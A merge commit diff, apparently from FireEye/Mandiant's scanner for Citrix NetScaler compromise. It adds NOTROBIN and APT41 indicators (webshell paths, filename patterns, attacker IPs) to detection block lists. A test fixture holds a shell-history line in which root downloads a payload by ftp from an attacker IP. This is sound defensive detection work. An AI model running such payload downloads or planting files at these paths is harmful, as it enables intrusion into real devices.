Merge pull request #26 from fireeye/2020-03-24

2020 03 24
mandiant · Mar 25, 2020 · 3f53c14 · 3f53c14
2 parents c0b6d17 + 897c994
commit 3f53c14
Show file tree

Hide file tree

Showing 12 changed files with 81 additions and 0 deletions.
diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh
@@ -14,6 +14,9 @@ scan_fs_notrobin() {
     declare -a notrobin_paths;
     notrobin_paths[0]="/var/nstmp/.nscache/httpd";
     notrobin_paths[1]="/tmp/.init/httpd";
+    # from subsequent post
+    notrobin_paths[2]="/var/nstmp/.nscache/prev.sh";
+    notrobin_paths[3]="/var/nstmp/.nscache/httpd-nscache_clean";
 
     local found=false;
     for notrobin_path in "${notrobin_paths[@]}"; do
@@ -23,6 +26,26 @@ scan_fs_notrobin() {
         fi
     done
 
+    declare -a dirs;
+    dirs[0]="/var/vpn/theme";
+    dirs[1]="/var/vpn/themes";
+
+    declare -a blacklist;
+    blacklist[0]="[a-f0-9]\{32\}\.php";
+    blacklist[1]="[a-f0-9]\{32\}_[a-zA-Z0-9]\{1,12\}\.\(php\|pl\)";
+
+    for dir in "${dirs[@]}"; do
+        if [ -d "$root_directory/$dir" ]; then
+            for blackterm in "${blacklist[@]}"; do
+                local entries=$(ls "$root_directory/$dir" | grep "$blackterm");
+                if [ -n "$entries" ]; then
+                    found=true;
+                    report_match "$entries, known path to NOTROBIN artifact.";
+                fi
+            done
+        fi
+    done
+
     if [ "$found" != true ]; then
         debug "did not find NOTROBIN artifacts";
     fi
@@ -45,11 +68,49 @@ scan_fs_isc_paths() {
     if [ "$found" != true ]; then
         debug "did not find artifact enumerated by SANS ISC";
     fi
+}
+
+scan_fs_apt41() {
+    declare -a paths;
+    paths[0]="/tmp/bsd";
+    paths[1]="/tmp/un";
+
+    local found=false;
+    for path in "${paths[@]}"; do
+        if [ -f "$root_directory/$path" ]; then
+            found=true;
+            report_match "$path, known path to post-exploitation artifact.";
+        fi
+    done
+
+    if [ "$found" != true ]; then
+        debug "did not find file system artifact";
+    fi
+}
+
+scan_fs_other_paths() {
+    declare -a paths;
+    paths[0]="/vpn/themes/imgs/tiny.php";
+    paths[1]="/vpn/themes/imgs/debug.php";
+    paths[2]="/vpn/themes/imgs/conn.php";
+
+    local found=false;
+    for path in "${paths[@]}"; do
+        if [ -f "$root_directory/$path" ]; then
+            found=true;
+            report_match "$path, known path to post-exploitation artifact.";
+        fi
+    done
 
+    if [ "$found" != true ]; then
+        debug "did not find file system artifact";
+    fi
 }
 
 scan_fs_known_paths() {
     scan_fs_netscalerd;
     scan_fs_notrobin;
     scan_fs_isc_paths;
+    scan_fs_apt41;
+    scan_fs_other_paths;
 }
diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh
@@ -45,6 +45,15 @@ ns_content_blacklist[25]="198.44.227.126";
 ns_content_blacklist[26]="/tmp/l.sh";
 ns_content_blacklist[27]="Digest::MD5";
 ns_content_blacklist[28]="Could not execute command";
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+ns_content_blacklist[29]="/tmp/bsd";
+ns_content_blacklist[30]="/tmp/un";
+ns_content_blacklist[31]="66.42.98.220";
+ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh";
+ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean";
+ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php";
+ns_content_blacklist[35]="/vpn/themes/imgs/debug.php";
+ns_content_blacklist[36]="/vpn/themes/imgs/conn.php";
 
 declare -a ns_exploit_dirs;
 ns_exploit_dirs[0]="/netscaler/portal/templates/";
@@ -59,6 +68,7 @@ ns_exploit_dirs[1]="/netscaler/portal/scripts/";
 ns_exploit_dirs[2]="/var/vpn/bookmark/";
 ns_exploit_dirs[3]="/var/tmp/netscaler/portal/templates/";
 ns_exploit_dirs[4]="/var/vpn/themes/";
+ns_exploit_dirs[5]="/var/vpn/theme/";
 
 # custom output formatting for matches.
 #   if the filename ends with .xml print the whole file,

diff --git a/scanners/shell-history.sh b/scanners/shell-history.sh
@@ -50,6 +50,15 @@ shell_history_blacklist[35]="157.157.87.22"
 shell_history_blacklist[36]="193.187.174.104"
 shell_history_blacklist[37]="62.113.112.33"
 shell_history_blacklist[38]="217.12.221.12"
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+shell_history_blacklist[39]="/tmp/bsd";
+shell_history_blacklist[40]="/tmp/un";
+shell_history_blacklist[41]="66.42.98.220";
+shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh";
+shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean";
+shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php";
+shell_history_blacklist[45]="/vpn/themes/imgs/debug.php";
+shell_history_blacklist[46]="/vpn/themes/imgs/conn.php";
 
 declare -a shell_history_paths;
 shell_history_paths[0]="/var/log/bash.log";

diff --git a/tests/file-system/apt41/.test b/tests/file-system/apt41/.test
diff --git a/tests/file-system/apt41/tmp/bsd b/tests/file-system/apt41/tmp/bsd
diff --git a/tests/file-system/apt41/tmp/un b/tests/file-system/apt41/tmp/un
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/.test b/tests/file-system/notrobin-var-vpn-theme-random/.test
diff --git a/...e-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php b/...e-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/.test b/tests/file-system/notrobin-var-vpn-theme-y/.test
diff --git a/.../file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl b/.../file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl
diff --git a/tests/shell-history/bsd/.test b/tests/shell-history/bsd/.test
diff --git a/tests/shell-history/bsd/var/log/bash.log b/tests/shell-history/bsd/var/log/bash.log
@@ -0,0 +1 @@
+Jan 19 24:26:52 <local7.notice> ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"